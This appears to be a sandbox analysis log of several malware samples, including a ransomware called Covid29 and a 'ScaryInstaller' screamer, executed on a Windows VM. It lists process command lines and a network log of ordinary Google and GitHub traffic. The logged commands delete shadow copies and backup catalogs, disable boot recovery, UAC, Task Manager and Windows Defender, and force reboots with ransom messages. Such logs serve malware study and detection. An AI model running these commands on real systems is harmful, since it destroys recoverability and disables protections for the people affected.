"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa877246f8,0x7ffa87724708,0x7ffa87724718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2884 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3448 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4928 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5400 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5400 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5208 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4944 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5056 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4112 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4036 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3860 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5072 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4840 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5652 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4864 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3468 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4688 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3304 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\AppData\Local\Temp\Temp1_Covid29 Ransomware.zip\TrojanRansomCovid29.exe

"C:\Users\Admin\AppData\Local\Temp\Temp1_Covid29 Ransomware.zip\TrojanRansomCovid29.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2315.tmp\TrojanRansomCovid29.bat" "

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2315.tmp\fakeerror.vbs"

C:\Windows\SysWOW64\PING.EXE

ping localhost -n 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Users\Admin\AppData\Local\Temp\2315.tmp\mbr.exe

mbr.exe

C:\Users\Admin\AppData\Local\Temp\2315.tmp\Cov29Cry.exe

Cov29Cry.exe

C:\Windows\SysWOW64\shutdown.exe

shutdown /r /t 300 /c "5 minutes to pay until you lose your data and system forever"

C:\Windows\SysWOW64\PING.EXE

ping localhost -n 9

C:\Users\Admin\AppData\Roaming\svchost.exe

"C:\Users\Admin\AppData\Roaming\svchost.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet

C:\Windows\system32\wbengine.exe

"C:\Windows\system32\wbengine.exe"

C:\Windows\System32\vdsldr.exe

C:\Windows\System32\vdsldr.exe -Embedding

C:\Windows\System32\vds.exe

C:\Windows\System32\vds.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im explorer.exe

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\covid29-is-here.txt

C:\Users\Admin\AppData\Local\Temp\2315.tmp\Cov29LockScreen.exe

Cov29LockScreen.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3444 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3400 /prefetch:8

C:\Users\Admin\Downloads\ScaryInstaller.exe

"C:\Users\Admin\Downloads\ScaryInstaller.exe"

C:\Users\Admin\Downloads\ScaryInstaller.exe

"C:\Users\Admin\Downloads\ScaryInstaller.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A914.tmp\creep.cmd" "

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im explorer.exe

C:\Users\Admin\Downloads\ScaryInstaller.exe

"C:\Users\Admin\Downloads\ScaryInstaller.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AEF0.tmp\creep.cmd" "

C:\Users\Admin\AppData\Local\Temp\A914.tmp\CreepScreen.exe

CreepScreen.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im explorer.exe

C:\Windows\SysWOW64\timeout.exe

timeout 5 /nobreak

C:\Users\Admin\AppData\Local\Temp\AEF0.tmp\CreepScreen.exe

CreepScreen.exe

C:\Windows\SysWOW64\timeout.exe

timeout 5 /nobreak

C:\Users\Admin\AppData\Local\Temp\A914.tmp\melter.exe

melter.exe

C:\Windows\SysWOW64\timeout.exe

timeout 10 /nobreak

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\C67F.tmp\creep.cmd" "

C:\Users\Admin\AppData\Local\Temp\AEF0.tmp\melter.exe

melter.exe

C:\Windows\SysWOW64\timeout.exe

timeout 10 /nobreak

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im explorer.exe

C:\Windows\SysWOW64\timeout.exe

timeout 5 /nobreak

C:\Users\Admin\AppData\Local\Temp\C67F.tmp\CreepScreen.exe

CreepScreen.exe

C:\Windows\SysWOW64\timeout.exe

timeout 10 /nobreak

C:\Users\Admin\AppData\Local\Temp\C67F.tmp\melter.exe

melter.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im CreepScreen.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im melter.exe

C:\Program Files\VideoLAN\VLC\vlc.exe

"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\A914.tmp\scarr.mp4"

C:\Windows\SysWOW64\reg.exe

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\bg.bmp /f

C:\Windows\SysWOW64\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im CreepScreen.exe

C:\Windows\SysWOW64\reg.exe

reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im melter.exe

C:\Windows\SysWOW64\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\net.exe

net user Admin /fullname:"IT'S TOO LATE!!!"

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 user Admin /fullname:"IT'S TOO LATE!!!"

C:\Windows\SysWOW64\timeout.exe

timeout 8 /nobreak

C:\Program Files\VideoLAN\VLC\vlc.exe

"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\AEF0.tmp\scarr.mp4"

C:\Windows\SysWOW64\reg.exe

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\bg.bmp /f

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x2f8 0x2fc

C:\Windows\SysWOW64\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\SysWOW64\reg.exe

reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\net.exe

net user Admin /fullname:"IT'S TOO LATE!!!"

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 user Admin /fullname:"IT'S TOO LATE!!!"

C:\Windows\SysWOW64\timeout.exe

timeout 8 /nobreak

C:\Windows\SysWOW64\reg.exe

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im CreepScreen.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im melter.exe

C:\Program Files\VideoLAN\VLC\vlc.exe

"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\C67F.tmp\scarr.mp4"

C:\Windows\SysWOW64\reg.exe

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\bg.bmp /f

C:\Windows\SysWOW64\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\SysWOW64\reg.exe

reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\net.exe

net user Admin /fullname:"IT'S TOO LATE!!!"

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 user Admin /fullname:"IT'S TOO LATE!!!"

C:\Windows\SysWOW64\timeout.exe

timeout 8 /nobreak

C:\Windows\SysWOW64\shutdown.exe

shutdown /r /t 5 /c "I CATCH YOU AND EAT YOUR FACE!!!"

C:\Windows\SysWOW64\shutdown.exe

shutdown /r /t 5 /c "I CATCH YOU AND EAT YOUR FACE!!!"

C:\Windows\SysWOW64\shutdown.exe

shutdown /r /t 5 /c "I CATCH YOU AND EAT YOUR FACE!!!"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=1940 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6016 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6108 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding

C:\Windows\explorer.exe

C:\Windows\explorer.exe /factory,{682159d9-c321-47ca-b3f1-30e36b2ec8b9} -Embedding

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\AppData\Local\Temp\Temp1_MS 0735.6+7421.zip\MS 0735.6+7421.exe

"C:\Users\Admin\AppData\Local\Temp\Temp1_MS 0735.6+7421.zip\MS 0735.6+7421.exe"

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x4 /state0:0xa38f5855 /state1:0x41c64e6d

Network

Country Destination Domain Proto
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 google.com udp
NL 142.250.179.142:80 google.com tcp
NL 142.250.179.142:80 google.com tcp
NL 172.217.168.196:80 www.google.com tcp
US 8.8.8.8:53 142.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 196.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 ogs.google.com udp
US 8.8.8.8:53 apis.google.com udp
NL 142.250.179.206:443 ogs.google.com tcp
DE 172.217.23.206:443 apis.google.com tcp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 206.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 206.23.217.172.in-addr.arpa udp
US 8.8.8.8:53 ssl.gstatic.com udp
DE 172.217.23.195:443 ssl.gstatic.com tcp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
US 8.8.8.8:53 195.23.217.172.in-addr.arpa udp
US 8.8.8.8:53 203.33.253.131.in-addr.arpa udp
NL 142.251.36.14:443 play.google.com udp
NL 142.251.36.14:443 play.google.com udp
US 8.8.8.8:53 98.39.251.142.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 encrypted-tbn0.gstatic.com udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 lh5.googleusercontent.com udp
NL 142.251.36.1:443 lh5.googleusercontent.com tcp
NL 142.251.36.1:443 lh5.googleusercontent.com tcp
US 8.8.8.8:53 1.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 id.google.com udp
NL 142.250.179.163:443 id.google.com tcp
US 8.8.8.8:53 163.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 240.81.21.72.in-addr.arpa udp
NL 142.251.36.14:443 encrypted-tbn0.gstatic.com udp
NL 142.250.179.163:443 id.google.com udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
US 140.82.113.4:443 github.com tcp
US 140.82.113.4:443 github.com tcp
US 8.8.8.8:53 4.113.82.140.in-addr.arpa udp
US 8.8.8.8:53 github.githubassets.com udp
US 8.8.8.8:53 avatars.githubusercontent.com udp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 185.199.108.133:443 avatars.githubusercontent.com tcp
US 8.8.8.8:53 user-images.githubusercontent.com udp
US 8.8.8.8:53 154.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 collector.github.com udp
US 140.82.113.21:443 collector.github.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 8.8.8.8:53 api.github.com udp
US 140.82.112.5:443 api.github.com tcp
US 8.8.8.8:53 5.112.82.140.in-addr.arpa udp
US 8.8.8.8:53 7.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 9.57.101.20.in-addr.arpa udp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
